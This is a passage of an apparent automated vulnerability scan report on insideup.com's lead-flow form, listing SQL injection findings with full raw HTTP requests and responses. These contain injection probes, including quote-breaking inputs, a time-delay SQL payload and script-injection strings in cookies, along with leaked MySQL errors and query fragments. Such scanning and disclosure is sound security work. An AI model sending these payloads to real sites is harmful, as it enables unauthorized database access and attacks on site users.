Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999''&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.127. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_404 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_404 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_404 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:04:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=</a style=x:expre/**/ssion' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:04:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.128. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_404 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_404 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_404 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pk8u5fp0990124ap06fpq2ad86; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.129. http://www.insideup.com/ppc/leadflow/caad00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the button3 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ajeec42ifbrtv7niv18775sdu6; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.130. http://www.insideup.com/ppc/leadflow/caad00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:04:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=</a style=x:expre/**/ssion' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:04:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.131. http://www.insideup.com/ppc/leadflow/caad00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:53:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/caad00/project.php?catId=30011'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011'&iusrc=iups' at line 5

